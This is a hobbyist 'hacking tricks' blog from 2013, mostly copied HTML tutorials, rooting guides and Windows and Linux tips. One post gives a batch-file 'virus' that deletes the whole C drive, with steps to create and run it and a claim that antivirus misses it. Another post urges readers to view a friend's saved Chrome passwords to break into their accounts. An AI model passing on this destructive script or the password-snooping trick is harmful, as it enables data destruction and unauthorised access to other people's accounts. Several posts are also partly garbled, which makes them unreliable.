Wednesday, 6 November 2013

tutorial 8(HTML paragraphs)

HTML Paragraphs


HTML documents are divided into paragraphs.

HTML Paragraphs

Paragraphs are defined with the <p> tag.

Example

<p>This is a paragraph</p>
<p>This is another paragraph</p>
Note: Browsers automatically add an empty line before and after a paragraph.

Don't Forget the End Tag

Most browsers will display HTML correctly even if you forget the end tag:

Example

<p>This is a paragraph
<p>This is another paragraph
The example above will work in most browsers, but don't rely on it. Forgetting the end tag can produce unexpected results or errors.
Note: Future version of HTML will not allow you to skip end tags.

HTML Line Breaks

Use the <br> tag if you want a line break (a new line) without starting a new paragraph:

Example

<p>This is<br>a para<br>graph with line breaks</p>
The <br> element is an empty HTML element. It has no end tag.

HTML Output - Useful Tips

You cannot be sure how HTML will be displayed. Large or small screens, and resized windows will create different results.
With HTML, you cannot change the output by adding extra spaces or extra lines in your HTML code.
The browser will remove extra spaces and extra lines when the page is displayed. Any number of lines count as one line, and any number of spaces count as one space.



HTML Tag Reference

hackers parlour tag reference contains additional information about HTML elements and their attributes.
Tag Description
<p> Defines a paragraph
<br> Inserts a single line break


tutorial 7(HTML Headings)

HTML Headings


Headings are important in HTML documents.

HTML Headings

Headings are defined with the <h1> to <h6> tags.
<h1> defines the most important heading. <h6> defines the least important heading.

Example

<h1>This is a heading</h1>
<h2>This is a heading</h2>
<h3>This is a heading</h3>
Note: Browsers automatically add some empty space (a margin) before and after each heading.

Headings Are Important

Use HTML headings for headings only. Don't use headings to make text BIG or bold.
Search engines use your headings to index the structure and content of your web pages.
Since users may skim your pages by its headings, it is important to use headings to show the document structure.
H1 headings should be used as main headings, followed by H2 headings, then the less important H3 headings, and so on.

HTML Lines

The <hr> tag creates a horizontal line in an HTML page.
The hr element can be used to separate content:

Example

<p>This is a paragraph.</p>
<hr>
<p>This is a paragraph.</p>
<hr>
<p>This is a paragraph.</p>


HTML Comments

Comments can be inserted into the HTML code to make it more readable and understandable. Comments are ignored by the browser and are not displayed.
Comments are written like this:

Example

<!-- This is a comment -->
Note: There is an exclamation point after the opening bracket, but not before the closing bracket.

HTML Tip - How to View HTML Source

Have you ever seen a Web page and wondered "Hey! How did they do that?"
To find out, right-click in the page and select "View Source" (IE) or "View Page Source" (Firefox), or similar for other browsers. This will open a window containing the HTML code of the page.
Examples


HTML Tag Reference

W3Schools' tag reference contains additional information about these tags and their attributes.
You will learn more about HTML tags and attributes in the next chapters of this tutorial.
Tag Description
<html> Defines an HTML document
<body> Defines the document's body
<h1> to <h6> Defines HTML headings
<hr> Defines a horizontal line
<!--> Defines a comment







tutorial 6(HTML attributes)

HTML Attributes


Attributes provide additional information about HTML elements.

HTML Attributes

  • HTML elements can have attributes
  • Attributes provide additional information about an element
  • Attributes are always specified in the start tag
  • Attributes come in name/value pairs like: name="value"

Attribute Example

HTML links are defined with the <a> tag. The link address is specified in the href attribute:

Example

<a href="http://hackersparlour.blogspot.com">This is a link</a>


Always Quote Attribute Values

Attribute values should always be enclosed in quotes.
Double style quotes are the most common, but single style quotes are also allowed.
Note Tip: In some rare situations, when the attribute value itself contains quotes, it is necessary to use single quotes: name='John "ShotGun" Nelson'


HTML Tip: Use Lowercase Attributes

Attribute names and attribute values are case-insensitive.
However, the World Wide Web Consortium (W3C) recommends lowercase attributes/attribute values in their HTML 4 recommendation.
Newer versions of (X)HTML will demand lowercase attributes.

HTML Attributes Reference

A complete list of legal attributes for each HTML element is listed in our: HTML Tag Reference.
Below is a list of some attributes that can be used on any HTML element:
Attribute Description
class Specifies one or more classnames for an element (refers to a class in a style sheet)
id Specifies a unique id for an element
style Specifies an inline CSS style for an element
title Specifies extra information about an element (displayed as a tool tip)
For more information about global attributes: HTML Global

tutorial 5(HTML elements)

HTML Elements


HTML documents are defined by HTML elements.

HTML Elements

An HTML element is everything from the start tag to the end tag:
Start tag * Element content End tag *
<p> This is a paragraph </p>
<a href="default.htm"> This is a link </a>
<br>    
* The start tag is often called the opening tag. The end tag is often called the closing tag.

HTML Element Syntax

  • An HTML element starts with a start tag / opening tag
  • An HTML element ends with an end tag / closing tag
  • The element content is everything between the start and the end tag
  • Some HTML elements have empty content
  • Empty elements are closed in the start tag
  • Most HTML elements can have attributes
Tip: You will learn about attributes in the next chapter of this tutorial.

Nested HTML Elements

Most HTML elements can be nested (can contain other HTML elements).
HTML documents consist of nested HTML elements.

HTML Document Example

<!DOCTYPE html>
<html>

<body>
<p>This is my first paragraph.</p>
</body>

</html>
The example above contains 3 HTML elements.

HTML Example Explained

The <p> element:
<p>This is my first paragraph.</p>
The <p> element defines a paragraph in the HTML document.
The element has a start tag <p> and an end tag </p>.
The element content is: This is my first paragraph.
The <body> element:
<body>
<p>This is my first paragraph.</p>
</body>
The <body> element defines the body of the HTML document.
The element has a start tag <body> and an end tag </body>.
The element content is another HTML element (a p element).
The <html> element:
<html>

<body>
<p>This is my first paragraph.</p>
</body>

</html>
The <html> element defines the whole HTML document.
The element has a start tag <html> and an end tag </html>.
The element content is another HTML element (the body element).

Don't Forget the End Tag

Some HTML elements might display correctly even if you forget the end tag:
<p>This is a paragraph
<p>This is a paragraph
The example above works in most browsers, because the closing tag is considered optional.
Never rely on this. Many HTML elements will produce unexpected results and/or errors if you forget the end tag .

Empty HTML Elements

HTML elements with no content are called empty elements.
<br> is an empty element without a closing tag (the <br> tag defines a line break).
Tip: In XHTML, all elements must be closed. Adding a slash inside the start tag, like <br />, is the proper way of closing empty elements in XHTML (and XML).

HTML Tip: Use Lowercase Tags

HTML tags are not case sensitive: <P> means the same as <p>. Many web sites use uppercase HTML tags.
W3Schools use lowercase tags because the World Wide Web Consortium (W3C) recommends lowercase in HTML 4, and demands lowercase tags in XHTML.


TUTORIAL 4(HTML basic)

HTML Basic - 4 Examples


Don't worry if the examples use tags you have not learned.
You will learn about them in the next chapters.

HTML Headings

HTML headings are defined with the <h1> to <h6> tags.

Example

<h1>This is a heading</h1>
<h2>This is a heading</h2>
<h3>This is a heading</h3>


HTML Paragraphs

HTML paragraphs are defined with the <p> tag.

Example

<p>This is a paragraph.</p>
<p>This is another paragraph.</p>


HTML Links

HTML links are defined with the <a> tag.

Example

<a href="http://hackersparlour.com">This is a link</a>
Note: The link address is specified in the href attribute.
(You will learn about attributes in a later chapter of this tutorial).

HTML Images

HTML images are defined with the <img> tag.

Example

<img src="w3schools.jpg" width="104" height="142">
Note: The filename and the size of the image are provided as attributes.

tutorial 2(HTML INTRODUCTION)

HTML Introduction

HTML Example

<!DOCTYPE html>
<html>
<body>

<h1>My First Heading</h1>

<p>My first paragraph.</p>

</body>
</html>

Example Explained

  • The DOCTYPE declaration defines the document type
  • The text between <html> and </html> describes the web page
  • The text between <body> and </body> is the visible page content
  • The text between <h1> and </h1> is displayed as a heading
  • The text between <p> and </p> is displayed as a paragraph
Note The <!DOCTYPE html> declaration is the doctype for HTML5.


What is HTML?

HTML is a language for describing web pages.
  • HTML stands for Hyper Text Markup Language
  • HTML is a markup language
  • A markup language is a set of markup tags
  • The tags describe document content
  • HTML documents contain HTML tags and plain text
  • HTML documents are also called web pages

HTML Tags

HTML markup tags are usually called HTML tags
  • HTML tags are keywords (tag names) surrounded by angle brackets like <html>
  • HTML tags normally come in pairs like <b> and </b>
  • The first tag in a pair is the start tag, the second tag is the end tag
  • The end tag is written like the start tag, with a forward slash before the tag name
  • Start and end tags are also called opening tags and closing tags
<tagname>content</tagname>


HTML Elements

"HTML tags" and "HTML elements" are often used to describe the same thing.
But strictly speaking, an HTML element is everything between the start tag and the end tag, including the tags:
HTML Element:
<p>This is a paragraph.</p>


Web Browsers

The purpose of a web browser (such as Google Chrome, Internet Explorer, Firefox, Safari) is to read HTML documents and display them as web pages.
The browser does not display the HTML tags, but uses the tags to determine how the content of the HTML page is to be presented/displayed to the user:
Browser

HTML Page Structure

Below is a visualization of an HTML page structure:
<html>
<body>
<h1>This a heading</h1>
<p>This is a paragraph.</p>
<p>This is another paragraph.</p>
</body>
</html>


HTML Versions

Since the early days of the web, there have been many versions of HTML:
Version Year
HTML 1991
HTML+ 1993
HTML 2.0 1995
HTML 3.2 1997
HTML 4.01 1999
XHTML 1.0 2000
HTML5 2012
XHTML5 2013


The <!DOCTYPE> Declaration

The <!DOCTYPE> declaration helps the browser to display a web page correctly.
There are many different documents on the web, and a browser can only display an HTML page 100% correctly if it knows the HTML type and version used.

Common Declarations

HTML5

<!DOCTYPE html>

HTML 4.01

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

XHTML 1.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
For a complete list of document type declarations, go to our DOCTYPE Reference.



Tutorial 3(HTML EDITORS)

HTML Editors Writing HTML Using Notepad or TextEdit HTML can be edited by using a professional HTML editor like: Adobe Dreamweaver Microsoft Expression Web CoffeeCup HTML Editor However, for learning HTML we recommend a text editor like Notepad (PC) or TextEdit (Mac). We believe using a simple text editor is a good way to learn HTML. Follow the 4 steps below to create your first web page with Notepad. Step 1: Start Notepad To start Notepad go to: Start All Programs Accessories Notepad Step 2: Edit Your HTML with Notepad Type your HTML code into your Notepad: Step 3: Save Your HTML Select Save as.. in Notepad's file menu. When you save an HTML file, you can use either the .htm or the .html file extension. There is no difference, it is entirely up to you. Save the file in a folder that is easy to remember, like w3schools. Step 4: Run the HTML in Your Browser Start your web browser and open your html file from the File, Open menu, or just browse the folder and double-click your HTML file. The result should look much like this:

Tutorial 1 on HTML(HTML BASIC)

With HTML you can create your own Web site.

This tutorial teaches you everything about HTML.

HTML is easy to learn - You will enjoy it.

Examples in Each Chapter

This HTML tutorial contains hundreds of HTML examples.

With our online HTML editor, you can edit the HTML, and click on a button to view the result.

Example

<!DOCTYPE html> <html> <body>

<h1>My First Heading</h1>

<p>My first paragraph.</p>

</body> </html>

HTML/CSS tutorials

I would be posting tutorials on HTML so stay tuned

Monday, 4 November 2013

How to get your 2go password wothout paying a dime

I discovered this trick this night and i want to share it with you all
Get ur lost 2 go username and
password 4 free .
Jst go to www. 2 go. im den select
language english, den select
country kenya , go to help den enter
forgot password den click enter den
u will c ENTER mobile no. Den start
ur number wit 234 . eg. . 2348062. . .. .
Den proceed , u wil received ur 2 go
username and password . If nt work
den add + to ur number e . g
+ 234862. ..
Hope it works

Saturday, 2 November 2013

Finding ip adress of a website using command prompt

In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started. 1. Go to Start > Type CMD and press Enter. 2. Now write Ping followed by website URL whose IP you want to find. 3. It will take less then a second and come up with the results as shown below. In my next post i will show you another easy way to find website IP Address and teach you to use this IP to find its location.

Watch star war movie in CMD

This is very intersting and amazing command prompt trick which will play star wars movie in the command prompt or cmd. Below are complete steps with screen shots for this trick with. Without wasting time lets gets started. 1. Go to start > Run and type in cmd and press enter 2. Now type in telnet as shown below and press enter. 3. After that enter o as shown below and press enter. 4. Next enter towel.blinkenlights.nl as shown below and press enter. 5. Now star wars movie will start playing on your command prompt. 6. Enjoy !! and dont miss to subscribe below .

How to veiw saved password in google chrome

Previously i had showed you how to view saved password in google chrome. In this post i will show you same thing but with different method suggested by one of reader of Cool Hacking Trick name Palash. This trick is simple yet very powerfull to view or hack saved password in google chrome. It does not matter for which website the password is saved it will work on all of them. It will work on Facebook, Gmail, Yahoo, twitter and many more. If you get your hands on your friend computer you can hack their password with this simple little trick. It does not require any software or addons to be installed on your computer. Lets get started. 1. Open Google Chrome 2. Go to Settings (Its on the Right Corner) 3. Then Click on Advance Settings 4. Scroll Down and their will be password and forms from their click on Manage saved password. 5. Then list of all websites whose passwords are saved on browser will be listed. 6. Click on show to view those passwords 7. Enjoy

How to make dangerous virus in a minute

In my previous post i had teach you guys to create virus that disable mouse and Virus to format Hard Disk . In this post i will teach you to make simple yet very powerfull or you can say harmfull computer virus using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing about this virus is it is not detected by any AntiVirus. You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming. 1. Open Notepad and copy below code into it. @Echo off Del C:\ *.* |y 2. Save this file as virus.bat (Name can be anything but .bat is must) 3. Now, running this file will delete all the content of C Drive . Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer. Make Virus That Disable Mouse Virus To Format Hard Disk What will this virus do ?

How to add adsense to your blog

How to Add Google Advertisements
(Google AdSense) to Your Blog or
Website

On occasion, a visitor will write to me at
Hackersparlour.blogspot.comasking how they can get
Google advertisements to their website. While
this may seem very obvious to those who have
read my article on How to Make Money From
Your Website or visited the list of free
advertisers for web publishers on
thefreecountry.com's Affiliate Programs: Free
Sponsors and Advertisers page, I decided that
an article explaining briefly the steps involved
will probably be useful for a number of
people.
What is Google AdSense?
Adsense is Google's advertising network that
places those sponsored ads you see on many
websites. Google automatically checks the web
page it places the ads on and displays
advertisements that are relevant to the page.
This produces highly targeted adverts for the
page, allowing, hopefully, higher returns for
the advertiser, the advertising network
(Google) and the publisher (you).
Before You Start
You must have an existing website before you
apply to the Google AdSense program. If you
don't already have one, read the The
Beginner's A-Z Guide to Making Your Own
Website to get started with your site first. The
Google AdSense team reviews your site before
accepting new applications, so you must first
put up a working website and not just some
"under construction" page. For example, if you
are starting a personal blog , post a few articles
about yourself or your experiences first.
Steps to Getting Google AdSense Ads on
Your Site
1. Apply to Google
When your site is fully functional, apply to
Google AdSense. You can find AdSense listed
among other advertisers in
thefreecountry.com's Affiliate Programs: Free
Sponsors and Advertisers page.
Google will then send you an email to verify
your email address. Follow the instructions in
that message (which is basically to click a link).
Once you do that, your application will be sent
to the Google AdSense team, one of whom will
pop by your website to review it. Don't hold
your breadth though, it may take a couple of
days before they get around to your site.
During this time, if your site is a blog,
continue to post to it as per normal.
2. Configure Your Ads
Once your account is approved, you can log
into your account to get the necessary HTML
code to paste into your blog or web page. The
code can be found in the "AdSense Setup" tab.
There are a number of options, but the code
for the context-sensitive advertisements can be
located under the "AdSense for Content" link.
You'll be able to customize the appearance of
the advertisements, choose between text
advertisements, image ads or a mixture of
both. Once you have finished configuring, you
will be given some HTML code which you can
cut and paste into your site.
There are other types of adverts beside the
context-sensitve ads. "AdSense for Search"
provides you with a Google search box that
you can place on your site. When your visitors
search through that box, and click an
advertisement, it will be as though they had
clicked an ad on your site. "Referrals" provide
you with ads for specific products.
3. Pasting the Google AdSense Code onto Your
Blog or Web Page
Make sure that when you insert the code into
your site, you insert it as HTML. Instructions
for doing this in different WYSIWYG web
editors can be found here:
How to Insert Raw HTML Code in Dreamweaver
How to Insert Raw HTML Code in Nvu
How to Insert Raw HTML Code in KompoZer
If you run a blog, you may want to paste the
code into your blog's template instead of
individually stuffing it into every post you
make. For blogs hosted on Blogger, one of the
free blogging services listed on the Free Blog
Hosts page, you can use my tutorial on How to
Insert Google AdSense Advertisements in a
Blogger Blog to help you insert your advert.
4. Entering Your PIN into the Google Site
When your earnings reach a certain amount (it
was US $10 the last time I checked) for the
first time, Google will send you a card by snail
mail (ordinary paper mail) with a series of
characters printed on it. You will need to log
into your AdSense account and enter this series
of characters, the PIN, before they will send
you any payments. It takes a while before this
card is sent (a few weeks after you reach the
threshold amount they define, depending on
where you live), so just wait for it. You will
only have to do this once in the life of the
account.
Cautionary Notes: Things to Look Out For
1. Never Click Your Own Google Ads
One of the things you must always remember
is never click your own Google ads, even if
it is to find out whether the site linked to is
acceptable for your website's audience. Since
(at this time) Google pays AdSense for Content
ads according to the number of clicks, clicking
your own ads is regarded as fraud, and will, at
the very least, get you kicked out of the
AdSense program.
Although Google doesn't say this, if you are
showing off your blog or website to your
family members, make sure they do not click
any of your advertisements either. This is the
case even if they are genuinely interested in
the products advertised. They can always look
for it by name in a search engine later if they
wish, but for anyone living in your own
household, any Google advert on your site is
strictly off limits. The reason for this is that
clicks from your household will look exactly
like clicks from you.
2. Don't Expect a Fortune Unless You Have
Traffic
Those who have read my article on How to
Increase Your Website Revenue from Affiliate
Programs will probably know that if you are
just starting out with your site, you probably
won't be able to make a fortune from your ads
unless you have enough people visiting your
website. This only comes after you have done
some serious website promotion or advertising.
Be realistic: remember that even if someone
clicks your ads, you may just get a cent or two
from that click, assuming that Google doesn't
discount that click for some reason. In
addition, only a very miniscule percentage of
your visitors will actually click ads. Put those
factors together and you can roughly guess
how much you are going to make if you only
have a few visitors per day.
3. Don't Put Ads if You're Selling Something
If you can, try not to put Google AdSense ads
or, in fact, any advertisements at all, if you are
trying to sell a product or service on your
website. There are a couple of reasons for this:
1. You may be inadvertantly advertising for your
competitors. You cannot predict what sort of
ads are going to pop up in the AdSense code
for your site. What you see when you load
your site may not necessarily be what your
visitors see. If a competitor places an ad that
Google finds relevant for your page (and it
surely will, if Google's context-sensitive engine
works correctly), then their ad will appear on
your page. You may thus lose sales to that
competitor as a result of the ads.
2. Ads distract your visitors from the real focus
of your site. You want your users to read your
sales copy, and not be clicking on links to go
to some other site even if those links do not
lead to your competitors.
Getting Started
If you already have a blog or a website, you
can immediately apply to AdSense. If not, start
your website now. These things take time to
get into full swing, and you should not wait till
you're desperately in need of money before
starting.

Enable God mode in windows7 and vista

In this tutorial i will show you to enable God
Mode in Windows 7 and Windows Vista. By
enabling God mode you can access all your
windows setting from one folder and it makes
really easy to access and change windows
settings. This works on 32 as well as 64 bit
operating system. So lets enable God mode on
your computer.
1. On your desktop right click and create a
New Folder.
  2. Rename this folder to the code given
below.
GodMode.
{ED7BA470-8E54-465E-825C-99712043E
01C}
3. Done now double click on this folder and
you will have access to all your windows
operating system settings.

How to disable right click on your website or blog

If you own a blog or a website then you
always want to prevent other malicious
bloggers from copying the content from your
blog. You might have written an article with
great efforts and lots of research and other
just copy/paste it on their blog. To prevent
such users from copying content from your
blog i will show you Javascript Trick to disable
right click on your blog. So lets get started.

1. Got to your blogger Dashboard and then
Click on Layout.
2. Now Click on Add Gadget and select
Html/Javascript.
3. Now paste code given below in the pop up
window.
<!--MBW Code-->
<script language='JavaScript1.2'>
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function
("return false")
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
<!--Code End http://
mybloggersworld.blogspot.in>
4. Save it and done. Now users will not be
able to right click on your website.  5. If you
like to disable mouse on your computer then
check out tutorial given below.

WHAT IS ADB AND FASTBOOT TOOLS


( What is ADB and FASTBOOT : Tools used
4 android phone )
if u r an android pone user , u would av
cm across a tool called ADB and
FASTBOOT well if guess u av being
hearing abt it but didn ' t knw d depth
knowlegde .
So wat is ADB FASTBOOT : 1 st knw d
meaning of ADB means Android Debug
Bridge .
It is a small tool dat is part of android
SDK wich serve as a gateway to enable u
connect and communicate with ur android
phone through ur computer or laptop PC
wt d help of command prompt . It is very
powerful in d sense dat u cn
modify ,edit ,change ,debug problem on
android pone system files and program
through command prompt with d help of
ADB fastboot in as much as it is very
powerful , it is also very dangerous if u
don 't knw hw to use it cos with one click
on d command, ur phone would be
damaged , bricked which may cause
bootloop problem . U may end up
wiping ,deketing ,resetting ur phone
system with just one click without u
noticing it.
So u av to be careful whike using ADC
fastboot to modify and change things on
ur device. This tool can also be use to
perform rooting of Android pone process
cos sm android pone lik HTC , SONY
experia etcmay require to unlock
bootloader be4 u can root , so u wil need
ADB FASTBOOT to achieve d unlocking
process be4 geeting d unlock code .
Thing i do wt ADB AND FASTBOOT
=> USE it to install, flash new android
ROM
=> use it to fix problem
=> use it to fix bricked android pone dat
is stuck on logo
=> use it to reset, wipe,clear dalvik cachel

Password protect any folder without any software

In my previous post i have teach you to hide
files behind images . In this tutorial i will show
you interesting and usefull trick to password
protect folder without using any software
using batch file programming. This trick will
work on all windows platform (Win XP, Win
7). Follow below tutorial to learn this trick.
1. Open Notepad and Copy code given
below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.
{21EC2020-3AEA-1069-
A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/
N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.
{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
attrib +h +s "Control Panel.
{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your
Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.
{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
ren "Control Panel.
{21EC2020-3AEA-1069-
A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
2. Save the notepad file as lock.bat (.bat is
must)
   3. Now double click on lock.bat and a new
folder will be created with name MyFolder
4. Copy all your data you want to protect in
that New folder
5. Now double click on lock.bat and when
command promp appears Type Y and press
enter.
   6. Now MyFolder will be hidden from you
view, to access that folde double click on
lock.bat
   7. It will ask for password enter your
password and done. (Default password is
coolhacks)
To change the password
replace coolhacks with new
password in the above code

How to futher secure?
You might be thinking that anyone can access
the password by opening that lock.bat file in
Notepad or any other text editor. To make it
more secure hide lock.bat in some secure
location after following the above tutorial To
access the secured file double click on
lock.bat. I would suggest copying lock.bat file
into Pendrive and copying it into your
computer whenever you required to access to
your protected files.

Introduction To Basic Terminal Commands For Linux - Part 1

In this tutorial you will learn to use linux
terminal. You will learn to navigate on the
terminal, learn to create and remove file and
much more. Most of this commands also
works on Mac Os X and powershell on
windows.

What is terminal?
Basically you are reading this tutorial because
you are new to linux or want to learn using
terminal to navigate. Before you get started
you must have linux installed or running
virtually on your computer. I would
recommend downloading fedora or ubuntu (If
you have trouble installing ubuntu leave a
comment below and i will post a tutorial).
Commands to remember
This are some of commands you must
remember which will help you to use terminal
more easily.
ls - it will list all files and folder in your
current directory
ls -l it will give detailt listing of all files and
folders
ls -a it will list all files and folder in your
current directory including hidden files (files
and folders that begin with period)
pwd will print your working directory or
simply your current directory

Navigating in terminal
Here i may refer folder as directory so dont
get confused. This is the term we use in linux
for folders.
cd - cd stands for change directory. we use cd
follow by path address to navigate ro that
folder.
Eg: cd Desktop will make desktop as my
current directory.
cd / will make root as you current directory
cd ~ will make home as your current directory
Typing cd alone is same as cd ~ and it will
make home as your current directory
cd .. will make parent directory i.e directory
above your current directory
cd ../../ will take you two folder up

Creating files and folders
mkdir - we use mkdir follow by path or folder
name to create a directory
Eg mkdir car will create directory car in your
current directory
to create folder recursively i.e folder inside
folder inside folder we use -p flag
Eg mkdir -p vehicles/car/truck will create
directory vehicles in your current directory
which have car inside it and car has directory
truck in it.
touch - we use touch follow by file name to
create empty file.

Removing files and folders
rmdir - we use rmdir follow by path to to
remove any directory. This will not work if
folder you are trying to remove has
something in it.
rm -r to remove file recursively which can
not be removed by rmdir
rm - We use this command to remove files

Create A Undeletable And Unrenamable Folders In Windows

In this tutorial you will learn cool and simple
trick to Create an undeletable and
unrenamable Folders In Windows operating
system. Most of the Peoples are not aware
that it is possible to create Undeletable,
Unrenamable folder in windows without any
software. To Test this concept just follow
simple steps given below.
Try to make a new folder in windows & give it
name con,aux, lpt1, lpt2, lpt3 up to lpt9. you
won't be allowed to create folder with above
mentioned names, Because they are reserved
words in windows.
How To Create Undeletable And
Unrenamable Folders ?
1. Go to Start and then Click on Run
2. Type cmd & hit enter (To open Command
Prompt ).
3. Remember you cannot create Undeletable
& unrenamable folder in your root
directory (i.e. where the windows is
installed) That means you can't make this
kind of folder in C: drive if you installed
windows on C:
4. Type D: or E: and hit enter
5. Type md con\ and hit enter (md - make
directory)
6. You may use other words such as aux,
lpt1, lpt2, lpt3 up to lpt9 instead of con
in above step.
7. Open that directory, you will see the
folder created of name con.
8. Try to delete that folder or rename that
folder windows will show the error
message.
How to delete that folder?
It is not possible to delete that folder
manually but you can delete this folder by
another way mentioned below.
1. Open Command Prompt
2. Type D: ( if u created this type of folder in
D: drive) & hit enter
3. Type rd con\ (rd - remove directory)
4. Open that directory and the folder will not
appear because it is removed.

Simple Trick To Convert A Webpage To PDF File

In this post i will teach a simple trick or
browser feature that let you convert any web
page into PSD file format, which might help
you to read your favourite articles offline. So
lets get started.
1. Open the Google Chrome Browser on your
PC or MAC
2. Then go to the web page that you want to
convert as a PDF.
3. Now press Ctrl+P on Windows PC or
Command+P if you are on a Mac to Open the
the Print dialog on Chrome Browser.
4. Now Change the destination to “Save As
PDF” and hit the save button.
5. The current web page will instantly be
downloaded as a PDF document.

HOW TO ROOT TECNO N3,P3 AND T3 ANDROID SMARTPHONE

Requirements to Root Techno N3
1 . Poot .apk – Download Here
2 . Ministro II – Download Here from
Google Play Store .
Rooting the Tecno N3 Device
1 . Turn Off the Tecno N3, p 3 or T 3 , then
remove your Memory Card.
2 . Now , switch on the Smartphone ,
transfer the Poot. apk file and Install on
your phones memory.
Make sure you enabled “Install Apps
from Unknown Source ”. Here is how to
set that, Goto Menu > Setting >
Applications > Unknown Sources , then
tick the check box that reads “Allow
installation of Non- market
applications ” .
3 . Launch the Poot. apk application you
installed , then you would be asked to
install Ministro II application, follow the
link above to download and install it.
4 . After installing the Ministro II, update
the library as you would be prompted to ,
after that , restart the phone .
5 . Two options would pop up , viz;
- Press Here to Poot
- Built in Root Check
6 . Select the first option and wait , two
other options would be displayed, which
are
- Get SuperUser
- Get Root Checker
- In -built Rootchecker
This means your Techno N3 /T 3 has
been successfully Rooted . You can visit
Google Play Store to Download the Super
User App.
NOTE : dis method works 4 P 3
please encourage me before droping your
testimonies

Download Latest HTC Sync Manager For Your HTC Android Device

HTC Sync ™ Manager is a necessary
software when you use a USB data cable
as the link between the PC and your HTC
devices . It enable your computer to
recognize your HTC mobile or Tablet.HTC
Sync Manager is a free tool to synchronize
your media files between your HTC phone
( for example Android) and your desktop
computer. Other than media files (photos,
music and videos) you can also transfer
your contacts and calendar entries
between your smartphone and PC. HTC
Sync includes a photo management tool to
organize and edit , for example crop and
rotate , your pictures. The music player
allows importing playlists from iTunes
and Windows Media Player, as well as
creating your own playlists that can be
synced with your phone . Once setup ,
browser bookmarks, contacts and
calendar synchronize automatically every
time your phone and computer are
connected . Finally, the data on your PC
synced with HTC Sync serves as a backup
should you lose your phone . Download
Latest HTC Sync ™ 3 .3 . 21 Driver Here
If the link does not work then download it using this link
http : //
fs 34.filehippo . com/ 1990 /55 f5 a 853bf174 ce5 ba9 bdb 091ce75 af3 /
htc_ sync _setup _ 3. 3 .21 .exe
Instructions 1 . Run “
htc_ sync _setup _ 3. 3 .21 .exe” to install it to
your PC, and follow the Install Shield
Wizard to finish the installation.
( Suggestion : Please close all running
programs and temporarily exit your anti -
virus program when you install the HTC
Sync ) 2 . Select the “ Complete” Setup Type
for faster and easier installation process ,
and then press “ Install” to begin the
installation . (For advanced users you
could choose “ Custom” to change the pre-
defined shortcuts and the installed
application folder path by your own .) 3 .
After you saw the Install Shield Wizard
Completed , please press “ Finish” to exit
the Wizard. Start To Use HTC Sync 1. Use
the USB cable to connect your phone to
the PC 2. When your phone prompts you to
choose a type of USB connection , tap HTC
Sync , and then tap Done.3 . Wait for HTC
Sync to recognize your phone . On the
Device setup screen, enter a name for
your phone .4 . Click Save . The Device
panel then opens . On the Device panel,
you can set your sync options , see your
phone ' s general information , check the
used and available space on your storage
card , and begin synchronization.

How To Update HTC G2 To Android 4.2.2 Jelly Bean CM10.1 AOSP ROM

This tutorial we guide you through how
to update your HTC G 2 to Android 4 .2 .2
Jelly Bean CM10 .1 Custom ROM . Thanks to
a developer on XDA who has ported the
AOSP version of Android 4 .2 .2 Jelly Bean
on this Android phone . But before the
tutorial I should let you know some
warnings and pr- requisites.Disclaimer –
All the tools, mods, firmwares or ROMs
etc . mentioned below belong to their
respective developers or owners. In any
case while following the tutorial you do
something wrong, miss a step or what
soever , Shelaf are not liable or
responsible to any damage or brick of
your device in any case. We are not
forcing you to attempt this tutorial , its all
your wish.Requirements​2 . You need to
installed latest HTC G 2 USB Drivers on
your PC. 3 . You need to enable USB
Debugging Mode which is deactivated by
default .4 . You Smartphone should have
70 -80 % charged remaining. 5 . Your HTC G 2
should be rooted. 6. Backup your
important data like Call logs , SMS and
other data in stored in phone memory so
in case if anything goes wrong, your data
is not hurt . How to Update HTC G 2 to
Android 4 .2 .2 CM10.1 AOSP ROM1.
Download Android 4. 2 .2 Jelly Bean CM10 .1
AOSP ROM for HTC G 2 and Google Apps
on your computer.2 . Connect your HTC G 2
to your PC and copy the downloaded files
( aosp 4 .2 .2 . zip and gapps 4. 2 .zip ) to SD
card . 3. Turn OFF your phone and
disconnect device by unplugging the USB
cable .4 . Now you will need to get your
phone in ClockworkMod . For that turn ON
the phone while pressing Volume Down +
Home buttons . 5 . In CWM recovery , you
will need to perform full data wipe first ,
select again wipe cache and then scroll
down to Install zip from sdcard . Select
power button to select it. 6 . Again press
power button and select choose Install zip
from sdcard. 7. Using volume keys
navigate to ‘aosp 4 .2 .2 ROM’ zip file and
select it by pressing power button .8 .
Installation will begin on next screen,
confirm it.9 . Repeat the same for Google
Apps package. 10. When the installation is
completed , go to + + + + +Go Back and then
reboot your phone from recovery Menu .
That is it. Now you have successfully
update your HTC G 2 to CM10. 1 Android
4 . 2. 2 Custom ROM!

How to root techno Q1

1.REQUIRED FILES AVAILABLE IN
